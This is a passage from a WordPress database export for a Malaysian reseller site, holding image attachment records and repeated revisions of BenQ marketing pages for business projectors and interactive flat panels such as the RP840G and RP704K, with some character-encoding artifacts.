src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06-300x192.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n		<p><strong>EasySetting</strong></p><p>Install Androidâ„¢ apps for a selection of displays through the BenQ cloud server. EasySetting can save you from repetitive manual installation.</p><p><strong>Over-the-Air Update (OTA)</strong></p><p>Upgrade your displays with the latest BenQ firmware via BenQâ€™s OTA update support to keep them running smoothly at all times.</p>		\n										<img width=\"560\" height=\"355\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07-300x190.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />','BenQ','','inherit','closed','closed','','1447-revision-v1','','','2019-01-07 17:21:06','2019-01-07 09:21:06','',1447,'https://bintara.com.my/blog/2019/01/07/1447-revision-v1/',0,'revision','',0),(2822,1,'2019-01-07 16:58:21','2019-01-07 08:58:21','','rp750k-22','','inherit','closed','closed','','rp750k-22','','','2019-01-07 16:58:21','2019-01-07 08:58:21','',1447,'https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22.jpg',0,'attachment','image/jpeg',0),(2823,1,'2019-01-07 16:59:22','2019-01-07 08:59:22','','rp750k-01','','inherit','closed','closed','','rp750k-01','','','2019-01-07 16:59:22','2019-01-07 08:59:22','',1447,'https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01.jpg',0,'attachment','image/jpeg',0),(2824,1,'2019-01-07 17:00:15','2019-01-07 09:00:15','','rp750k-02','','inherit','closed','closed','','rp750k-02','','','2019-01-07 17:00:15','2019-01-07 09:00:15','',1447,'https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02.jpg',0,'attachment','image/jpeg',0),(2825,1,'2019-01-07 17:02:08','2019-01-07 09:02:08','','rp750k-08','','inherit','closed','closed','','rp750k-08','','','2019-01-07 17:02:08','2019-01-07 09:02:08','',1447,'https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08.png',0,'attachment','image/png',0),(2826,1,'2019-01-07 17:02:44','2019-01-07 09:02:44','','rp750k-09','','inherit','closed','closed','','rp750k-09','','','2019-01-07 17:02:44','2019-01-07 09:02:44','',1447,'https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09.png',0,'attachment','image/png',0),(2827,1,'2019-01-07 17:03:39','2019-01-07 09:03:39','','rp750k-10','','inherit','closed','closed','','rp750k-10','','','2019-01-07 17:03:39','2019-01-07 09:03:39','',1447,'https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10.png',0,'attachment','image/png',0),(2828,1,'2019-01-07 17:04:27','2019-01-07 09:04:27','','rp750k-04','','inherit','closed','closed','','rp750k-04','','','2019-01-07 17:04:27','2019-01-07 09:04:27','',1447,'https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04.jpg',0,'attachment','image/jpeg',0),(2829,1,'2019-01-07 17:06:42','2019-01-07 09:06:42','','rp750k-05','','inherit','closed','closed','','rp750k-05','','','2019-01-07 17:06:42','2019-01-07 09:06:42','',1447,'https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05.jpg',0,'attachment','image/jpeg',0),(2830,1,'2019-01-07 17:07:29','2019-01-07 09:07:29','','rp750k-06','','inherit','closed','closed','','rp750k-06','','','2019-01-07 17:07:29','2019-01-07 09:07:29','',1447,'https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06.jpg',0,'attachment','image/jpeg',0),(2831,1,'2019-01-07 17:08:17','2019-01-07 09:08:17','','rp750k-07','','inherit','closed','closed','','rp750k-07','','','2019-01-07 17:08:17','2019-01-07 09:08:17','',1447,'https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07.jpg',0,'attachment','image/jpeg',0),(2853,1,'2019-02-07 16:24:06','2019-02-07 08:24:06','','Evolve_80','','inherit','closed','closed','','evolve_80','','','2019-02-07 16:24:06','2019-02-07 08:24:06','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Evolve_80.png',0,'attachment','image/png',0),(2834,1,'2019-01-07 17:35:51','2019-01-07 09:35:51','<h1>Projectors</h1><h3>Â </h3><h2>Business Projector (Smart Design for Presentations)</h2><h3>High Brightness for Well-Lit Rooms</h3><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.</p><p>Â </p><h2>Interactive Classroom Projectors</h2><h3>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</h3><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.</p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li><li>High Brightness from 3000-3500 ANSI Lumens</li><li>High resolution with (Ultra) Short Throw</li><li>Scalable for Wireless Use and Interactivity</li></ul><h3>Â </h3><h2>Interactive Flat Panel</h2><h3>Meeting Room &amp; Boardroom</h3><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.</p><p>Â </p><h3>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h3><h5>Work Collaboratively and Conduct Business Efficiently</h5><p>The RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.</p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.</p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.</p><h4>Â </h4><h5>How BenQ Display turns meeting rooms into places of efficiency</h5><ul><li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li><li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li><li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li></ul><p>Â </p><center>[maxbutton id=\"1\" ]</center><p>Â </p>','BenQ','','publish','closed','closed','','benq','','','2019-09-24 14:48:57','2019-09-24 06:48:57','',0,'https://bintara.com.my/?page_id=2834',0,'page','',0),(2835,1,'2019-01-07 17:37:16','2019-01-07 09:37:16','','Elementor #2834','','inherit','closed','closed','','2834-revision-v1','','','2019-01-07 17:37:16','2019-01-07 09:37:16','',2834,'https://bintara.com.my/blog/2019/01/07/2834-revision-v1/',0,'revision','',0),(2836,1,'2019-01-07 17:37:16','2019-01-07 09:37:16','<h3>BenQ</h3><h3><u>Projectors</u></h3><h3>Business Projector (Smart Design for Presentations)</h3><h4>High Brightness for Well-Lit Rooms</h4><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.</p><h3>Interactive Classroom Projectors</h3><h4>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</h4><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.</p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li><li>High Brightness from 3000-3500 ANSI Lumens</li><li>High resolution with (Ultra) Short Throw</li><li>Scalable for Wireless Use and Interactivity</li></ul><h3><u>Interactive Flat Panel</u></h3><h4>Meeting Room &amp; Boardroom</h4><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.</p><h4>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h4><p><strong>Work Collaboratively and Conduct Business Efficiently</strong><br />The RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.</p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.</p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.</p><h4>How BenQ Display turns meeting rooms into places of efficiency</h4><ul><li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li><li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li><li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li></ul><p>[maxbutton id=\"1\" ]</p>','Elementor #2834','','inherit','closed','closed','','2834-revision-v1','','','2019-01-07 17:37:16','2019-01-07 09:37:16','',2834,'https://bintara.com.my/blog/2019/01/07/2834-revision-v1/',0,'revision','',0),(2854,1,'2019-02-07 16:24:57','2019-02-07 08:24:57','','Jabra_Evolve75e','','inherit','closed','closed','','jabra_evolve75e','','','2019-02-07 16:24:57','2019-02-07 08:24:57','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Evolve75e.png',0,'attachment','image/png',0),(2845,1,'2019-01-07 17:46:16','2019-01-07 09:46:16','<h3>BenQ</h3>\r\n<h3><u>Projectors</u></h3>\r\n<h3>Business Projector (Smart Design for Presentations)</h3>\r\n<h4>High Brightness for Well-Lit Rooms</h4>\r\nIdeal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.\r\n<h3>Interactive Classroom Projectors</h3>\r\n<h4>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</h4>\r\nFutureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.\r\n<ul>\r\n 	<li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li>\r\n 	<li>High Brightness from 3000-3500 ANSI Lumens</li>\r\n 	<li>High resolution with (Ultra) Short Throw</li>\r\n 	<li>Scalable for Wireless Use and Interactivity</li>\r\n</ul>\r\n<h3><u>Interactive Flat Panel</u></h3>\r\n<h4>Meeting Room &amp; Boardroom</h4>\r\nDigital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.\r\n<h4>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h4>\r\n<strong>Work Collaboratively and Conduct Business Efficiently</strong>\r\nThe RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.\r\n\r\nWhether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.\r\n\r\nFeaturing an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.\r\n<h4>How BenQ Display turns meeting rooms into places of efficiency</h4>\r\n<ul>\r\n 	<li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li>\r\n 	<li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li>\r\n 	<li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li>\r\n 	<li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]','BenQ','','inherit','closed','closed','','2834-revision-v1','','','2019-01-07 17:46:16','2019-01-07 09:46:16','',2834,'https://bintara.com.my/blog/2019/01/07/2834-revision-v1/',0,'revision','',0),(2844,1,'2019-01-07 17:45:13','2019-01-07 09:45:13','<h3>BenQ</h3><h3><u>Projectors</u></h3><h3>Business Projector (Smart Design for Presentations)</h3><h4>High Brightness for Well-Lit Rooms</h4><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.</p><h3>Interactive Classroom Projectors</h3><h4>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</h4><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.</p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li><li>High Brightness from 3000-3500 ANSI Lumens</li><li>High resolution with (Ultra) Short Throw</li><li>Scalable for Wireless Use and Interactivity</li></ul><h3><u>Interactive Flat Panel</u></h3><h4>Meeting Room &amp; Boardroom</h4><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.</p><h4>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h4><p><strong>Work Collaboratively and Conduct Business Efficiently</strong><br />The RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.</p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.</p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.</p><h4>How BenQ Display turns meeting rooms into places of efficiency</h4><ul><li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li><li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li><li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li></ul><p>[maxbutton id=\"1\" ]</p>','BenQ','','inherit','closed','closed','','2834-revision-v1','','','2019-01-07 17:45:13','2019-01-07 09:45:13','',2834,'https://bintara.com.my/blog/2019/01/07/2834-revision-v1/',0,'revision','',0),(2841,1,'2019-01-07 17:40:20','2019-01-07 09:40:20','<h3>BenQ</h3>\r\n<h3><u>Projectors</u></h3>\r\n<h3>Business Projector (Smart Design for Presentations)</h3>\r\n<h4>High Brightness for Well-Lit Rooms</h4>\r\nIdeal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.\r\n<h3>Interactive Classroom Projectors</h3>\r\n<h4>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</h4>\r\nFutureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.\r\n<ul>\r\n 	<li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li>\r\n 	<li>High Brightness from 3000-3500 ANSI Lumens</li>\r\n 	<li>High resolution with (Ultra) Short Throw</li>\r\n 	<li>Scalable for Wireless Use and Interactivity</li>\r\n</ul>\r\n<h3><u>Interactive Flat Panel</u></h3>\r\n<h4>Meeting Room &amp; Boardroom</h4>\r\nDigital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.\r\n<h4>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h4>\r\n<strong>Work Collaboratively and Conduct Business Efficiently</strong>\r\nThe RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.\r\n\r\nWhether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.\r\n\r\nFeaturing an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.\r\n<h4>How BenQ Display turns meeting rooms into places of efficiency</h4>\r\n<ul>\r\n 	<li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li>\r\n 	<li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li>\r\n 	<li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li>\r\n 	<li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]','BenQ','','inherit','closed','closed','','2834-revision-v1','','','2019-01-07 17:40:20','2019-01-07 09:40:20','',2834,'https://bintara.com.my/blog/2019/01/07/2834-revision-v1/',0,'revision','',0),(2848,1,'2019-01-08 11:33:06','2019-01-08 03:33:06','<h3>BenQ Corporate Interactive Smartboard Touchscreen Display | RP704K 4K UHD 70â€™â€™</h3>		\n		<h4>4K UHD 70â€™â€™ Education Interactive Flat Panel Display | RP704K</h4><p><strong>Your Caring Mate for Enhanced Interactive Learning</strong></p><p><br />The RP704K is designed to tap into the dynamic possibilities of the classroom and help teachers build a healthy and engaging learning environment. Not only does it come with Germ-Resistant Screen, but the Smartboard RP704K also comes installed with proficient annotation tools for enhanced class participation. It is your ultimate interactive display to achieve a touch-enhanced, smooth and fun learning experience.</p>		\n										<img width=\"800\" height=\"487\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-1024x623.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-1024x623.png 1024w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-300x182.png 300w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-768x467.png 768w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1.png 1110w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>Create a Healthy Learning Environment for Students</h4>		\n										<img width=\"560\" height=\"258\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1.png 560w, https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1-300x138.png 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n		<p><strong>Germ-Resistant Screen</strong><br />The Germ-Resistant Screen is empowered by a multilayer coating of the non-toxic, enduring nano ionic silver agent that kills most germs accumulating on screen surfaces and prevent cross-infection or epidemic in classrooms. The ionic silverâ€™s antimicrobial feature remains effective even after thorough cleaning or long periods of use.</p><p><strong>* TUV Test Confirmed</strong><br />TUV is the worldâ€™s leading inspection and verification company, providing internationally approved testing services to verify product quality and performance. Placing our trust TUVâ€™s best-in-class facilities and world-recognized integrity, we had their experts rigidly evaluate the screenâ€™s antimicrobial efficacy. Proved by the JIS Z 2801:2010 testing methods, the result shows that BenQâ€™s AG+ Screen can effectively restrain the microbial growth of Escherichia coli, Staphylococcus aureus and Pseudomonas aeruginosa. To maintain antimicrobial efficacy, please frequently wipe your touch screen with a clean, soft, lint-free cloth moisturized with a neutral detergent.</p><p><strong>Smart Eye-Care Solution</strong></p><p>The Smart Eye-Care solution can function intuitively with the help of the embedded motion sensor. For a smooth and comfortable viewing experience, RP704K will automatically activate Flicker-Free and Low Blue Light features by detecting the movement of users close to the screen.<br />*For Android devices, BenQâ€™s RP704K will automatically set screen backlight to a comfortable setting instead of switching to the Low Blue Light mode.</p><p><strong>TÃœV-Certified Low Blue Light Technology</strong></p><p>Blue light emissions from displays may cause adverse health effects such as macular degeneration or disrupted melatonin secretion. BenQâ€™s Low Blue Light technology minimizes blue light exposure and allows for healthier time spent in front of the display, helping you create the best and most comfortable viewing experience for you and your students.</p>		\n										<img width=\"642\" height=\"438\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight.png 642w, https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight-300x205.png 300w\" sizes=\"(max-width: 642px) 100vw, 642px\" />											\n										<img width=\"616\" height=\"395\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before.png 616w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before-300x192.png 300w\" sizes=\"(max-width: 616px) 100vw, 616px\" />											\n		<p><strong>Anti-Glare Display</strong></p><p>Screen glare can cause reflected images on the screen, making it challenging for students to see, take notes, and remain focused. The RP704Kâ€™s anti-glare glass surface can effectively reduce reflections, freeing students from excessive squinting with more legible text and clearer images, avoiding eye strain and facilitating more effective instruction.</p>		\n			<h4>EZWrite 4.1 : An Easy and Fun Annotation Solution</h4>		\n		<p><strong>Intelligent Handwriting Recognition</strong></p><p>The Smartboard RP704Kâ€™s handwriting recognition feature allows presenters to simultaneously convert written text, numbers, forms, and drawings into legible materials without having to switch modes while effectively facilitating smooth teaching flow.</p>		\n										<img width=\"560\" height=\"352\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22-300x189.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n										<img width=\"510\" height=\"361\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01.jpg 510w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01-300x212.jpg 300w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p><strong>Wireless Solution for Seamless Collaboration</strong></p><p>InstaQShare is the software designed for seamless wireless presentation and collaboration during lectures. It allows the smooth streaming of visual, audio files and Full HD quality videos. Users can also mirror content from mobile devices, and invite up to 16 participants for seamless collaboration.</p><p><strong>20-Point Multi-Touch Interactivity</strong></p><p>As the leading pioneer on the market, the RP Series supports multi-touch capability up to 20 points, allowing more students to participate in a discussion and highly engaging activities at once.</p>		\n										<img width=\"510\" height=\"330\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02.jpg 510w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02-300x194.jpg 300w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n			<h4>Facilitate Teaching Flow with Friendly Design</h4>		\n										<img width=\"360\" height=\"333\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08-300x278.png 300w\" sizes=\"(max-width: 360px) 100vw, 360px\" />											\n		<p><strong>Integrated Front-Facing Speaker and Pen Tray</strong></p><p>RP704K integrates the repositioned audio speakers with the screen-length pen tray. The two front-facing,16W speakers create better sound transmission and bring more audiovisual enjoyment to interactive learning. The pen tray offers a handy place to keep IFP stylus and other tools that help enrich and smoothen presentations, providing fast access and avoiding needless interruption.</p>		\n										<img width=\"360\" height=\"333\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09-300x278.png 300w\" sizes=\"(max-width: 360px) 100vw, 360px\" />											\n		<p><strong>Account Management System for Personalized File Management</strong></p><p>BenQ\'s IFPs support multi-account management through NFC technology, which allows users to directly access their personal system-setting and folders by simply scanning ID cards with the built-in sensor, as well as easily lock screens when not in use. AMS also offers instant access to major cloud storage services without having to enter password.</p><p><strong>NFC Pen</strong></p><p>With a simple tap of the NFCPen at the sensor, you can instantly activate the EZWrite 4.1 annotation app, and begin to annotate with different colors. Built with NFC technology, the NFCPen is battery-free and doesn\'t require device pairing. It is also waterproof while being able to withstand long-term use.</p>		\n										<img width=\"360\" height=\"333\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10-300x278.png 300w\" sizes=\"(max-width: 360px) 100vw, 360px\" />											\n										<img width=\"560\" height=\"352\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04-300x189.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n		<p><strong>Front Buttons</strong> <br />The front buttons, including Power, Home, Back, Setting, and Volume, further enhance the convenience of using IFPs and help teachers easily control the pace of lectures.</p><p><strong>Instant Plug and Play</strong> <br />RP704K can save you from the hassles of complicated setup. Simply connect to a PC via USB and youâ€™re all set to deliver compelling IFP touch-enhanced lessons.</p><p><strong>Parental Control</strong> <br />BenQ IFPs come with website control feature that blocks certain websites by configuring proxy server settings, which is useful for preventing students from accessing inappropriate content.</p>		\n			<h4>Display Management Support</h4>		\n		<p><strong>Multiple Display Administrator (MDA)</strong></p><p>Multiple Display Administrator (MDA) allows school IT to remotely control the general display settings of IFPs and schedule their on/off times, which helps to create hassle-free maintenance.</p>		\n										<img width=\"560\" height=\"303\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05-300x162.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n										<img width=\"560\" height=\"358\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06-300x192.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n		<p><strong>EasySetting</strong></p><p>Install Androidâ„¢ apps for a selection of displays through the BenQ cloud server. EasySetting can save you from repetitive manual installation.</p><p><strong>Over-the-Air Update (OTA)</strong></p><p>Upgrade your displays with the latest BenQ firmware via BenQâ€™s OTA update support to keep them running smoothly at all times.</p>		\n										<img width=\"560\" height=\"355\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07-300x190.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n		<p>[maxbutton id=\"1\" ]</p>','BenQ Corporate Interactive Smartboard Touchscreen Display | RP704K 4K UHD 70â€™â€™','','inherit','closed','closed','','1447-revision-v1','','','2019-01-08 11:33:06','2019-01-08 03:33:06','',1447,'https://bintara.com.my/blog/2019/01/08/1447-revision-v1/',0,'revision','',0),(3226,1,'2019-09-23 15:06:00','2019-09-23 07:06:00','Benq','Benq','Benq','inherit','closed','closed','','artboard-51x','','','2019-09-23 15:06:17','2019-09-23 